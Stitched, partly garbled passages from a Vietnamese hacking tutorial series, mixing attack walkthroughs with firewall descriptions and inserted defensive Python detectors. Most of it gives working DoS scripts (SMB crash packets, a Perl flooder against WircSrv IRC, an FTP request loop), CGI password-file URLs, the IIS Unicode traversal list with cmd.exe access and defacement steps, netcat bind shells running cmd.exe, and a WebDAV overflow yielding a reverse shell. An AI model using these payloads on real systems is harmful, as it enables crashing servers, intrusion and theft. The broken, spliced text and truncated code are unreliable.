_ In this kind of DoS attack, we only need to send a data packet of large size to the target machine through the ping command and its system will hang .
_ Example : ping -l 65000
c . ) Teardrop :
_ As we know, all data travelling over the network from the source system to the destination system goes through 2 processes : at the source system the data is split into small fragments, and each fragment must carry a certain offset value that identifies the position of the fragment in the packet being sent. When the fragments reach the destination system, it uses the offset values to put the fragments back together in the original order . Exploiting this weakness, we only need to send the destination system a series of packets with overlapping offset values. The destination system cannot reassemble these packets; it loses control and may crash, reboot or stop working if the number of packets with overlapping offset values is too large !
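The offset arithmetic behind Teardrop and Ping of Death can be checked before reassembly is attempted. The following Python is an added example, not part of the original article; the function names and sample fragments are constructed, and a 20-byte IPv4 header without options is assumed.

```python
from collections import defaultdict

IP_MAX_TOTAL = 65535   # largest value the 16-bit IPv4 total-length field can hold
IP_HEADER = 20         # assumption: header without options


def check_fragments(frags):
    """Validate the fragments of one datagram.

    frags: (offset_in_8_byte_units, payload_len, more_fragments) tuples that
    share source, destination, protocol and IP id. Returns sorted findings.
    """
    findings = set()
    covered_to = 0
    for off, length, more in sorted(frags):
        start = off * 8              # the header stores the offset in 8-byte units
        end = start + length
        if more and length % 8:
            findings.add("non-final fragment length not a multiple of 8")
        if start < covered_to:
            findings.add("overlap (Teardrop pattern)")
        if IP_HEADER + end > IP_MAX_TOTAL:
            findings.add("reassembled size over 65535 (Ping of Death pattern)")
        covered_to = max(covered_to, end)
    return sorted(findings)


def scan(packets):
    """Group captured fragments per datagram and return only the suspicious ones."""
    groups = defaultdict(list)
    for p in packets:
        key = (p["src"], p["dst"], p["proto"], p["id"])
        groups[key].append((p["off"], p["len"], p["mf"]))
    flagged = {}
    for key, frags in groups.items():
        findings = check_fragments(frags)
        if findings:
            flagged[key] = findings
    return flagged


def pkt(src, ident, off, length, mf):
    return {"src": src, "dst": "192.0.2.1", "proto": 17, "id": ident,
            "off": off, "len": length, "mf": mf}


# Constructed sample capture (documentation addresses, not real traffic).
SAMPLE = [
    pkt("198.51.100.5", 1, 0, 1480, True),     # ordinary 3-fragment datagram
    pkt("198.51.100.5", 1, 185, 1480, True),
    pkt("198.51.100.5", 1, 370, 40, False),
    pkt("203.0.113.9", 7, 0, 40, True),        # second fragment lies inside the first
    pkt("203.0.113.9", 7, 3, 8, False),
    pkt("203.0.113.9", 8, 0, 1480, True),      # last fragment ends beyond 65535
    pkt("203.0.113.9", 8, 8189, 1480, False),
]

if __name__ == "__main__":
    for key, findings in scan(SAMPLE).items():
        print(key, findings)
```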
d . ) SYN Attack :
_ In a SYN attack, the hacker sends the destination system a series of SYN packets with source IP addresses that do not exist. When the destination system receives these SYN packets, it replies to the non-existent addresses and waits for a response from those fake IP addresses . Because these IP addresses do not exist, the destination system waits in vain and also keeps these waiting "requests" in memory, wasting a considerable amount of memory on the server that should have been used for other work instead of waiting for responses that never come . If we send at the same time many packets with
crud = (
# Yu cu SMBnegprot
"""
ff 53 4d 42 72 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 f4 01 00 00 01 00 00 81 00 02 50 43
20 4e 45 54 57 4f 52 4b 20 50 52 4f 47 52 41 4d
20 31 2e 30 00 02 4d 49 43 52 4f 53 4f 46 54 20
4e 45 54 57 4f 52 4b 53 20 31 2e 30 33 00 02 4d
49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 4b
53 20 33 2e 30 00 02 4c 41 4e 4d 41 4e 31 2e 30
00 02 4c 4d 31 2e 32 58 30 30 32 00 02 53 61 6d
62 61 00 02 4e 54 20 4c 41 4e 4d 41 4e 20 31 2e
30 00 02 4e 54 20 4c 4d 20 30 2e 31 32 00
""",
# Yu cu setup SMB X
"""
ff 53 4d 42 73 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 f4 01 00 00 01 00 0d ff 00 00 00 ff
ff 02 00 f4 01 00 00 00 00 01 00 00 00 00 00 00
00 00 00 00 00 17 00 00 00 57 4f 52 4b 47 52 4f
55 50 00 55 6e 69 78 00 53 61 6d 62 61 00
""",
# Yu cu SMBtconX
"""
ff 53 4d 42 75 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 f4 01 00 08 01 00 04 ff 00 00 00 00
00 01 00 17 00 00 5c 5c 2a 53 4d 42 53 45 52 56
45 52 5c 49 50 43 24 00 49 50 43 00
""",
# Yu cu khI to SMBnt X
"""
ff 53 4d 42 a2 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 08 f4 01 00 08 01 00 18 ff 00 00 00 00
07 00 06 00 00 00 00 00 00 00 9f 01 02 00 00 00
00 00 00 00 00 00 00 00 00 00 03 00 00 00 01 00
00 00 00 00 00 00 02 00 00 00 00 08 00 5c 73 72
76 73 76 63 00
""",
# yu cu bin dch SMB
"""
ff 53 4d 42 25 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 08 f4 01 00 08 01 00 10 00 00 48 00 00
00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 4c
00 48 00 4c 00 02 00 26 00 00 08 51 00 5c 50 49
50 45 5c 00 00 00 05 00 0b 00 10 00 00 00 48 00
00 00 01 00 00 00 30 16 30 16 00 00 00 00 01 00
00 00 00 00 01 00 c8 4f 32 4b 70 16 d3 01 12 78
5a 47 bf 6e e1 88 03 00 00 00 04 5d 88 8a eb 1c
c9 11 9f e8 08 00 2b 10 48 60 02 00 00 00
""",
# SMBtrans Request
"""
ff 53 4d 42 25 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 08 f4 01 00 08 01 00 10 00 00 58 00 00
00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 4c
00 58 00 4c 00 02 00 26 00 00 08 61 00 5c 50 49
50 45 5c 00 00 00 05 00 00 03 10 00 00 00 58 00
00 00 02 00 00 00 48 00 00 00 00 00 0f 00 01 00
00 00 0d 00 00 00 00 00 00 00 0d 00 00 00 5c 00
5c 00 2a 00 53 00 4d 00 42 00 53 00 45 00 52 00
56 00 45 00 52 00 00 00 00 00 01 00 00 00 01 00
00 00 00 00 00 00 ff ff ff ff 00 00 00 00
"""
)
crud = map(a2b, crud)
def smb_send(sock, data, type=0, flags=0):
d = struct.pack('!BBH', type, flags, len(data))
#print 'send:', b2a(d+data)
sock.send(d+data)
def smb_recv(sock):
s = sock.recv(4)
assert(len(s) == 4)
type, flags, length = struct.unpack('!BBH', s)
data = sock.recv(length)
assert(len(data) == length)
#print 'recv:', b2a(s+data)
return type, flags, data
def nbss_send(sock, data):
sock.send(data)
def nbss_recv(sock):
s = sock.recv(4)
assert(len(s) == 4)
return s
def main(host, port=139):
s = socket(AF_INET, SOCK_STREAM)
s.connect(host, port)
nbss_send(s, nbss_session)
nbss_recv(s)
for msg in crud[:-1]:
smb_send(s, msg)
smb_recv(s)
smb_send(s, crud[-1]) # no response to this
s.close()
if __name__ == '__main__':
print 'Sending poison...',
main(sys.argv[1])
print 'done.'
c th lm down c server ca i phng bn cn phi c thi gian DoS , nu
CODE
die------------------------------------------------------------Shutdown.
quit------------------------------------------------------------Log off.
mtimer N----------------------------------------------------t thI gian tn cng DoS
, vI N nhn gi tr t 1--> 1999 giy .
dos IP-------------------------------------------------------Tn cng n mt a ch IP
xc nh .
mdie pass---------------------------------------------------V hiu ho tt c cc
Broadcast , nu nh passwd chnh xc . Mt lnh c gi ti ("d1e l44adsl")
The main function of a firewall is to control the flow of information between the Internet and the intranet. It sets up a mechanism that governs the information flow between the internal network (intranet) and the Internet. For example :
Allowing or disallowing services that access the outside (from the intranet to the Internet) or that access the inside from outside (from the Internet into the intranet).
Monitoring the data flow between the Internet and the intranet.
Controlling which addresses may access, and banning particular addresses.
Controlling users and the access made by users.
Controlling the content of the information moving across the network.
However, a firewall still has some limitations :
A firewall is not intelligent the way a person is; it cannot read and understand each kind of information and judge whether its content is good or bad. A firewall can only block the intrusion of unwanted information sources, and the accessing addresses have to be specified explicitly.
It cannot stop attacks that do not pass through it, or attacks carried in the data (data-driven attacks).
It cannot scan for computer viruses in the data passing through it, because new kinds of virus appear rapidly and there are many ways of encoding data to escape the firewall's control.
Some firewall software :
1-SMTP Gateway-Proxy Server for the SMTP port :
The SMTP Gateway is built on two programs, Smap and Smapd, and is used to resist access through the SMTP protocol. Its principle is to sit in front of the system's original mail server program and not let outside systems connect to the mail server, because inside its trusted network the mail server usually has fairly high privileges. On Unix, the mail server program is Sendmail (see above for what Sendmail is used for).
When a remote system connects to the SMTP port, the smap program takes over serving it, changes to a dedicated directory and sets its USER-ID to an ordinary level (without privileges). The sole purpose of smap is to hold the SMTP dialogue with other systems, collect the mail, write it to disk, log it and exit. Smapd, for its part, scans this directory regularly; when it finds mail it hands the data to Sendmail for delivery to personal mailboxes or for forwarding to other mail servers .
In this way an unknown user on the network cannot connect to the mail server, and the information arriving by this route can all be controlled . However, the weakness of this program is that it cannot deal with problems such as anonymous mail or attacks that come by other routes.
2-FTP Gateway-Proxy Server for the FTP service :
The proxy server for the FTP service controls access to the FTP service based on IP address and hostname, and provides secondary access control that optionally allows any FTP command to be blocked or logged . The destination addresses can also be selected (allowed or denied). All connections and the volume of data transferred are logged.
The FTP Gateway by itself does not threaten the security of the system, because it runs with its root set to an empty directory and performs no file input/output other than reading its configuration file . The FTP server only provides the FTP service and does not care who does or does not have the right to download files . The determination of rights must therefore be set up on the FTP Gateway and must be carried out there, except for the actual upload/download of files.
The FTP Gateway can prevent intrusion into the network through the FTP port fairly flexibly (it allows blocking individual addresses or a whole network) and also controls access to each capability such as downloading/uploading information.
3-Telnet Gateway-Proxy Server for Telnet :
The Telnet Gateway is a proxy server that manages network access based on IP address and hostname, and provides secondary access control that optionally allows any destination to be blocked. All connections and data passing through are logged. Each time a user connects to the Telnet Gateway, the user must choose the connection method. The Telnet Gateway does no harm to the system because it only operates within a defined (permitted) scope. Example : the system hands control over to a dedicated directory and at the same time denies access to other directories and files.
The Telnet Gateway is used to control access to the internal network. Unauthorised accesses cannot perform any action, while legitimate accesses are logged (access time, actions performed).
4-HTTP Gateway Proxy Server for the Web :
Cm n s ng h ca cc bn v y l phn 7
42 . ) K thut n cng DoS vo WircSrv Irc Server v5.07 :
_ WircSrv IRC l mt Server IRC thng dng trn Internet ,n s b Crash nu nh b
cc Hacker gi mt Packet ln hn gi tr ( 65000 k t ) cho php n Port 6667.
Bn c th thc hin vic ny bng cch Telnet n WircSrv trn Port 6667:
Nu bn dng Unix:
[hellme@die-communitech.net$ telnet irc.example.com 6667
Trying example.com...
Connected to example.com.
Escape character is '^]'.
[buffer]
Windows cng tng t:
telnet irc.example.com 6667
Lu : [buffer] l Packet d liu tng ng vi 65000 k t .
Tuy nhin , chng ta s crash n rt n gin bng on m sau ( Cc bn hy nhn
vo on m v t mnh gii m nhng cu lnh trong , cng l mt trong
nhng cch tp luyn cho s phn x ca cc hacker khi h nghin cu . No , chng
ta hy phn tch n mt cch cn bn ):
CODE
#!/usr/bin/perl #< == on m ny cho ta bit l dng cho cc lnh trong perl
use Getopt::Std;
use Socket;
getopts('s:', \%args);
if(!defined($args{s})){&usage;}
my($serv,$port,$foo,$number,$data,$buf,$in_addr,$paddr,$proto);
$foo = "A"; # y l NOP
$number = "65000"; # y l tt c s NOP
$data .= $foo x $number; # kt qu ca $foo times $number
$serv = $args{s}; # lnh iu khin server t xa
$port = 6667; # lnh iu khin cng t xa , n c mc nh l 6667
$buf = "$data";
$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");
socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
connect(S, $paddr) ||die ("Error: $!");
select(S); $| = 1; select(STDOUT);
print S "$buf";
print S "$buf";
print("Data has been successfully sent to $serv\n");
sub usage {die("\n\n Li WircSrv Version 5.07s
c th tn cng bng DoS \n gi 2 64k gi tin n server lm cho n crash.\n -s
server_ip\n\n");}
s dng ci m ny , bn hy save n vo mt file *.pl , rI down chng trnh
activeperl v si , setup n ri vo HH DOS bn ch cn gi file ny ra theo lnh sau
:
C:\>perl < ng dn n file *.pl >
( n by gi ti s khng by tht cn k na m s tng dn kh ln , nu bn
no nghin cu k cc bi trc th cc bn s lm c d dng thi )
43 . ) K thut tn cng DoS vo my tnh s dng HH Win2000 :
_ Mun s dng c n , bn phi c activeperl , ri s dng nh hng dn tng
t trn . Save on m vo file *.pl rI dng lnh perl gi n ra :
CODE
#!/usr/bin/perl -w
use Socket;
use Net::RawIP;
use Getopt::Std;
getopts("s:d:p:l:n:v:t:f:T:rL",%o);$ver="0.3a";$0=~s#.*/##;
print"--- $0 v.$ver b/ Nelson Brito / Independent Security Consultant --- ";
$l=$o{'l'}?$o{'l'}+28:800+28;$n=$o{'n'}?$o{'n'}/2:800/2;
$v=$o{'v'}||4;$t=$o{'t'}||1;$f=$o{'f'}||0;$T=$o{'T'}||64;
$p=$o{'p'}?$o{'p'}:(getservbyname('isakmp','udp')||die"getservbyname: $! ");
($o{'s'}&&$o{'d'})||die
" Use: $0 [IP Options] [UDP Options] ",
"IP Options: ",
use IO::Socket;
sub initiate {
if ($ARGV[0] eq '') {die "Usage: perl abc.pl <host> <port> <username>
<password>\nVi du : perl abc.pl 127.0.0.1 21 anonymous me@\n";}
$host = $ARGV[0];
$port = $ARGV[1];
$user = $ARGV[2];
$pass = $ARGV[3];
};
sub connecttoserver {
print("Connect den host: $host\n");
$socket = IO::Socket::INET->new (PeerAddr => $host,
PeerPort => $port,
Proto => "tcp",
Type => SOCK_STREAM
) || die "khong the connect den $host";
print "Connect thanh cong . Loggin vao...\n";
};
sub login {
print "user $user\n";
print $socket "user $user\r\n";
$response = <$socket>;
print "$response\n";
print "pass $pass\n";
print $socket "pass $pass\r\n";
$response = <$socket>;
print "$response\n";
print "Logged in. Dang tan cong DoS doi phuong. Nhan CTRL-C de ngung.\n";
};
sub doit {
for (;; ){
print "retr a:/x\n";
print $socket "retr a:/x\r\n";
$response = <$socket>;
print "$response";
}
}
initiate();
connecttoserver();
login();
doit();
http://www.xxx.com/cgi-bin/calen..._admin.pl?admin
_ Vy l bn c c quyn admin ri .
b . ) WebBBS Script :
_WebAdverts Script l mt scripts cho php webmasters hin th nhng biu ng
lun phin ( qung co chng hn ) hay thm vo trong trang Web , cui cng bn
c th s dng kt hp password v username ci t banners to mt banner
accounts mi , xo accounts view sensitive info, vv.vv
_a ch passwd ca WebAdverts l :
http://www.xxx.com/cgi-bin/advert/adpassword.txt
sau khi gii m bn logging vo:
http://www.xxx.com/cgi-bin/advert/ads_admin.pl
login nh l script administrator .
c . ) WWWBoard Script :
_WWWBoard c file password c th tm thy trong pasword.txt , chng ta hy
search n bng t kho cgi-bin/wwwebboard hoc webboard/password.txt .
d . ) Mailmachine Script :
_Mailmachine.cgi l mt webbased mailinglist , bn c th trng thy file
adressed.txt cha tt c danh sch khch ng k , nhng danh sch c th thy
ti nhng urls sau:
http://www.xxx.com/cgi-bin/mailman/addresses.txt
http://www.xxx.com/cgi-bin/maillist/addresses.txt
http://www.xxx.com/cgi-bin/mail/addresses.txt
bn cng nn tm addresses.txt m i khi chng c i thnh cc tn khc .
Chng c th cha cc thng tin quan trng cho php bn khai thc .
Vic tm ra cc trang b li ny hn cc bn bit , ti s khng nhc li na ( Nu
ai cha bit th vui lng c lI nhng phn trc ) .
====================================================
==
Nhn y ti xin nh chnh li l trong cc on code m ti phn tch v post ln
nhng phn trc ti s khng thm k hiu # vo trc nhng cu phn tch
, dn n vic mt s bn thc mc l on code khng hot ng . Ti thnh
tht xin li cc bn v s ca ti , cc bn ch cn ly on code ra v thm vo
du # pha trc dng ch thch Ting Vit ca ti l c ( Thng thng ti
c s dng du < == gii thch phi ui on code . Cc bn hy
m fix nh .
Chc vui v .
GOOKLUCK!!!!!!!!!!!!
Ht phn 7 .
Bi vit ca ANHDENDAY
y l phn 8 .
47 . ) Cc cng c cn thit hack Web :
_ i vi cc hacker chuyn nghip th h s khng cn s dng nhng cng c ny
m h s trc tip setup phin bn m trang Web nn nhn s dng trn my ca
mnh test li . Nhng i vi cc bn mi vo ngh th nhng cng c ny rt
cn thit , hy s dng chng mt vi ln bn s bit cch phi hp chng vic
tm ra li trn cc trang Web nn nhn c nhanh chng nht . Sau y l mt s
cng c bn cn phi c trn my lm n ca mnh :
_ Cng c th 1 : Mt ci proxy dng che du IP v vt tng la khi cn ( Cch
to 1 ci Proxy ti by phn 7 , cc bn hy xem li nh ) .
_ Cng c th 2 : Bn cn c 1 shell account, ci ny thc s quan trng i vi
bn . Mt shell account tt l 1 shell account cho php bn chy cc chng trnh
chnh nh nslookup, host, dig, ping, traceroute, telnet, ssh, ftp,...v shell account
cn phi ci chng trnh GCC ( rt quan trng trong vic dch (compile) cc exploit
c vit bng C) nh MinGW, Cygwin v cc dev tools khc.
Shell account gn ging vi DOS shell,nhng n c nhiu cu lnh v chc nng hn
DOS . Thng thng khi bn ci Unix th bn s c 1 shell account, nu bn khng
ci Unix th bn nn ng k trn mng 1 shell account free hoc nu c ai ci
Unix v thit lp cho bn 1 shell account th bn c th log vo telnet (Start --> Run
--> g Telnet) dng shell account . Sau y l 1 s a ch bn c th ng k
free shell account :
http://www.freedomshell.com/
http://www.cyberspace.org/shell.html
http://www.ultrashell.net/
_Cng c th 3 : NMAP l Cng c qut cc nhanh v mnh. C th qut trn mng
din rng v c bit tt i vi mng n l. NMAP gip bn xem nhng dch v no
ang chy trn server (services / ports : webserver , ftpserver , pop3,...),server
ang dng h iu hnh g,loi tng la m server s dng,...v rt nhiu tnh
nng khc.Ni chung NMAP h tr hu ht cc k thut qut nh : ICMP (ping
aweep),IP protocol , Null scan , TCP SYN (half open),... NMAP c nh gi l cng
c hng u ca cc Hacker cng nh cc nh qun tr mng trn th gii.
Mi thng tin v NMAP bn tham kho ti http://www.insecure.org/ .
_ Cng c th 4 : Stealth HTTP Security Scanner l cng c qut li bo mt tuyt
vi trn Win32. N c th qut c hn 13000 li bo mt v nhn din c 5000
exploits khc.
_ Cng c th 5 : IntelliTamper l cng c hin th cu trc ca mt Website gm
nhng th mc v file no, n c th lit k c c th mc v file c set password.
Rt tin cho vic Hack Website v trc khi bn Hack mt Website th bn phi nm
mt s thng tin ca Admin v Website .
_ Cng c th 6 : Netcat l cng c c v ghi d liu qua mng thng qua giao thc
TCP hoc UDP. Bn c th dng Netcat 1 cch trc tip hoc s dng chng trnh
script khc iu khin Netcat. Netcat c coi nh 1 exploitation tool do n c th
to c lin kt gia bn v server cho vic c v ghi d liu ( tt nhin l khi
Connection: close
Content-Type: text/html
sent 17, rcvd 245: NOTSOCK
If you want to keep a log, use -o <file_name>. Example :
nc -vv -o nhat_ki.log 172.16.84.2 80
look at the file nhat_ki.log to see what it recorded :
CODE
< 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK.
< 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F
< 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54
< 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 # GMT..Server: Ap
< 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win
< 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32)..Last-Modifi
< 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb
< 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM
< 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: "0-cec-
< 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea"..Accep
< 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes.
< 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length:
< 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f # 3308..Connectio
< 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten
< 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm
< 000000f0 6c 0d 0a 0d 0a # l....
the < sign means the server sent to netcat
the > sign means netcat sent to the server
_ Port scanning :
Run netcat with the -z option . To scan ports faster, use -n so that netcat does not need to query DNS. Example : scanning the TCP ports (1->500) of host 172.16.106.1
CODE
[dt@vicki /]# nc -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 443 (?) open
(UNKNOWN) [172.16.106.1] 139 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open
(UNKNOWN) [172.16.106.1] 80 (?) open
(UNKNOWN) [172.16.106.1] 23 (?) open
if you need to scan UDP ports, use -u
CODE
[dt@vicki /]# nc -u -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 1025 (?) open
(UNKNOWN) [172.16.106.1] 1024 (?) open
(UNKNOWN) [172.16.106.1] 138 (?) open
(UNKNOWN) [172.16.106.1] 137 (?) open
(UNKNOWN) [172.16.106.1] 123 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open
Ring i vi Netcat cho Win, bn c th lng nghe ngay trn cng ang lng nghe.
Ch cn ch nh a ch ngun l -s<a_ch_ip_ca_my_ny>. V d:
CODE
netstat -a
...
TCP nan_nhan:domain nan_nhan:0 LISTENING <- cng 53 ang lng nghe
...
E:\>nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53 -> lng nghe ngay trn cng 53
listening on [172.16.84.1] 53 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163?
?
Trn Windows NT, t Netcat ch lng nghe, khng cn phi c quyn
Administrator, ch cn login vo vi 1 username bnh thng khi ng Netcat l
xong.
Ch : bn khng th chy netcat vi ... -u -e cmd.exe... hoc ...-u -e /bin/sh... v
netcat s khng lm vic ng. Nu bn mun c mt UDP shell trn Unix, hy dng
udpshell thay cho netcat.
( Da theo bi vit ca huynh Vicky )
49 . ) K thut hack IIS server 5.0 :
_ IIS server vi cc phin bn t trc n phin bn 5.0 u c li ta c th khai
thc , do by gi hu ht mi ngi u dng IIS server 5.0 nn li cc phin bn
trc ti khng cp n . By gi ti s by cc bn cch hack thng qua cng c
activeperl v IE , cc bn c th vn dng cho cc trang Web VN v chng b li ny
rt nhiu . Ta hy bt u nh .
_ Trc ht cc bn hy download activeperl v Unicode.pl .
_ S dng telnet xc nh trang Web ta tn cng c s dng IIS server 5.0 hay
khng :
CODE
telnet < tn trang Web > 80
GET HEAD / HTTP/1.0
Nu n khng bo cho ta bit mc tiu ang s dng chng trnh g th cc bn hy
thay i cng 80 bng cc cng khc nh 8080, 81, 8000, 8001 .v.v
_ Sau khi xc nh c mc tiu cc bn vo DOS g :
CODE
perl unicode.pl
Host: ( g a ch server m cc bn mun hack )
Port: 80 ( hoc 8080, 81, 8000, 8001 tu theo cng m ta telnet trc ) .
_ Cc bn s thy bng lit k li ( c lp trnh trong Unicode.pl ) nh sau :
CODE
[1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+
[2]/scripts..%c1%9c../winnt/system32/cmd.exe?/c+
[3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+
[4]/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+
[5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+
[6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+
[7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+
[8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+
[9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+
[10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+
[11]/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+
[12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+
[13]/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+
[14]/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\
%e0\%80\%af../winnt/system32/cmd.exe?/c+
[15]/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
[16]/samples/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
[17]/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
[18]/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
[19]/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
[20]/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
You will see all of the entries above if the victim's website has all of those flaws; if the victim's server only has the 13th and 17th flaws, the result table shows only lines 13 and 17 .
Ti ly VD l bng kt qu cho ti bit trang Web nn nhn b li th 3 v 7 , ti s
ra IE v nhp on m tng ng trn Address :
http://www.xxx.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+ < == li
dng th 3
hoc
http://www.xxx.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+ < == li
dng th 7
n y cc bn c th xm nhp vo server ca nn nhn ri , cc bn hy
s dng lnh trong DOS m khai thc thng tin trong ny . Thng thng cc trang
Web nm th mc vinetpub\wwwroot , cc bn vo c rI th ch cn thay
index.html vI tn hack by . L c ri , ng quy h nh .
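Seen from the server side, every entry in the list above hides a path separator behind a non-canonical UTF-8 encoding or a malformed escape. The following is an added example, not code from the original article or from Unicode.pl: a Python check that decodes a request target the permissive way and reports such sequences. The function names and the sample list are assumptions constructed for illustration.

```python
import re

# (first lead byte, last lead byte, payload mask, sequence length, smallest code
# point that really needs that length). 5- and 6-byte forms predate RFC 3629.
FORMS = [(0xC0, 0xDF, 0x1F, 2, 0x80), (0xE0, 0xEF, 0x0F, 3, 0x800),
         (0xF0, 0xF7, 0x07, 4, 0x10000), (0xF8, 0xFB, 0x03, 5, 0x200000),
         (0xFC, 0xFD, 0x01, 6, 0x4000000)]
HEX2 = re.compile(rb"[0-9A-Fa-f]{2}")

def percent_decode(path):
    """%XX -> bytes. A malformed escape (e.g. %pc) stays literal and is counted."""
    raw, out, bad, i = path.encode("latin-1", "replace"), bytearray(), 0, 0
    while i < len(raw):
        ok = raw[i] == 0x25 and HEX2.fullmatch(raw[i + 1:i + 3])
        bad += raw[i] == 0x25 and not ok
        out.append(int(raw[i + 1:i + 3], 16) if ok else raw[i])
        i += 3 if ok else 1
    return bytes(out), bad

def lax_utf8(data):
    """Decode the way a permissive decoder does and record overlong sequences."""
    text, overlong, i = [], [], 0
    while i < len(data):
        form = next((f for f in FORMS if f[0] <= data[i] <= f[1]), None)
        n = form[3] if form and i + form[3] <= len(data) else 1
        cp = data[i] & (form[2] if n > 1 else 0xFF)
        for cont in data[i + 1:i + n]:
            cp = (cp << 6) | (cont & 0x3F)  # continuation bits deliberately unchecked
        ch = chr(cp) if cp <= 0x10FFFF else "\ufffd"
        if n > 1 and cp < form[4]:
            overlong.append((data[i:i + n].hex(), ch))
        text.append(ch)
        i += n
    return "".join(text), overlong

def inspect(target):
    """Classify one request target (path plus optional query string)."""
    data, bad = percent_decode(target.split("?", 1)[0])
    decoded, overlong = lax_utf8(data)
    return {"decoded": decoded, "malformed_escapes": bad, "overlong": overlong,
            "hidden_separator": any(ch in "/\\" for _, ch in overlong),
            "suspicious": bool(overlong) or bad > 0}

# Constructed sample: three entries from the list above plus one benign request.
SAMPLE = ["/scripts/..%c0%af../winnt/system32/cmd.exe?/c+",
          "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+",
          "/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+",
          "/images/caf%C3%A9.png"]
```

A path check is only reliable when it runs on the fully decoded, canonical form; a request whose decoding reports any overlong sequence can simply be rejected, since no legitimate client produces one.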
GOODLUCK!!!!!!!!!!!!!!!
( End of part 8 )
Article by ANHDENDAY
This is part 9
50 . ) Technique for hacking a server through the WebDAV buffer overflow bug :
_ Introduction : The World Wide Web Distributed Authoring and Versioning (WebDAV) protocol is a set of extensions to the HTTP protocol that provides a standard way of editing and managing files between computers on the Internet. A buffer overflow bug was discovered in a Windows 2000 component used by WebDAV that can allow an attacker to take control of the computer .
_ Preparation : Besides the tools introduced in the earlier parts, also download www32.brinkster.com/anhdenday/wb.zip and extract it into C:\
_ Exploitation :
+ Find a Web site running IIS 5.0
+ Open DOS and put NETCAT in listening mode :
CODE
C:\>nc -vv -l -p 53
listening on [any] 53 ...
We have it listen on port 53 because the firewall does not block this port .
+ Open one more DOS window .
+ We use the WebDAV tool we just downloaded .
c:\wb.exe <IP of the IIS server> <IP of your own machine used for the attack> <listening port> [padding=1,2,3...]
Example :
CODE
C:\> webdav xxx.xxx.xxx.xxx 203.162.xxx.xxx 53 1
[Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]
www.coromputer.net && undernet #coromputer
Checking WebDav on 'xxx.xxx.xxx.xxx' ... FOUND
exploiting ntdll.dll through WebDav [ret: 0x00100010]
Connecting... CONNECTED
Sending evil request... SENT
Now if you are lucky you will get a shell.
+ If you are lucky you can get a shell on the IIS server . If the machine used for the attack shows the following result, then you have a shell :
CODE
C:\>nc -vv -l -p 53
listening on [any] 53 ...
